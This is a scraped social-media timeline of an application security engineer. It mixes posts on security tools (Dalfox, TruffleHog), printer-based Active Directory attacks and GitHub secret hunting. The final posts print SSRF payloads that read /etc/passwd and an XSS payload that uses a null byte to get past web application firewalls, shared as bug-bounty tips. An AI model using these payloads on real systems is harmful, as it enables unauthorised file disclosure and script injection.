L’Hex
11.4K posts

L’Hex
@elh3x
Application Security Engineer
Middle East, Joined May 2019
1.2K Following, 204 Followers
L’Hex retweeted

Dalfox v3 has been released🔥
I've been rewriting it in Rust since August last year, and it's finally done.
The biggest change is the engine. v3 no longer depends on a headless browser like v2 did. Instead, it uses DOM/AST analysis to check whether an XSS finding is actually valid.
Tested on xssmaze, various challenge sites, and real-world targets, it reduces false negatives and false positives more effectively while scanning faster than v2.
github.com/hahwul/dalfox/…


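@MouloudiaDZ3 Shut it down on him, give him a fine, and deport him to his country....
In the Gulf they tremble and respect the law, otherwise it is closure, a fine and prison, followed immediately by deportation and expulsion, and he will never see the Gulf again.
They found Algeria naive, with good people and lax, so they did as they pleased.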

Abusing Printers to Compromise Active Directory
In many organizations, sysadmins are only focused on servers and workstations. But printers sit on the same network. They are rarely monitored with the same level of attention as more "important" systems.
Many of those printers store AD user credentials which can be extracted in plaintext to attack the DC. Even if the AD is well secured, these creds can be used to poison shares with LNK files. Even print jobs themselves can become a target especially when they contain confidential information.
Unfortunately, many of the IoT devices in the corporate environments are outdated and aren't taken seriously. We also mentioned how you can fix that.
hackers-arise.com/iot-hacking-ab…
@three_cube @_aircorridor
#iot #pentesting


🐷 Secrets scanner with 800+ detectors for API keys, tokens, passwords, and leaked credentials.
TruffleHog scans:
• Git repositories & commit history
• GitHub, GitLab, Docker & S3
• Filesystems, CI/CD, Postman & Jenkins
• GCS, Elasticsearch & Hugging Face
Features:
• Live credential verification
• Secret classification & analysis
• Docker image and binary scanning
• JSON, SARIF & GitHub Actions support
• GitHub Action & pre-commit integration
Built for security engineers, DevSecOps teams, and bug hunters.
🔗 github.com/trufflesecurit…
#CyberSecurity #DevSecOps #SecretScanning #BugBounty #GitHub


Day 6 / 30 — GITHUB RECON THAT PAYS
Devs still leak secrets in public repos. In 2026. Mine them.
Tools:
→ trufflehog — github.com/trufflesecurit…
→ gitleaks — github.com/gitleaks/gitle…
→ GitDorker — github.com/obheda12/GitDo…
→ github-subdomains — github.com/gwen001/github…
→ gitGraber — github.com/hisxo/gitGraber
#bugbountytips #github #osint #bugbounty #infosec


SSRF Payloads for LFR/LFD
file:/etc//passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/
SSRF POLYGLOT
file:///etc/./passwd?/../passwd
#CF403
rodoassis.medium.com/on-ssrf-server…

PHP Null Byte on Parameter Trick
Use to fool WAFs that decode before parsing.
It might consider the anchor with dangling (but harmless) markup instead of the real vector.
param%00p%3D<A/Href="<Svg/OnLoad=alert(1)//
More on brutelogic.net/brute-art-bypa…
PoC gym.brutelogic.net/?p05%00p%3D%3C…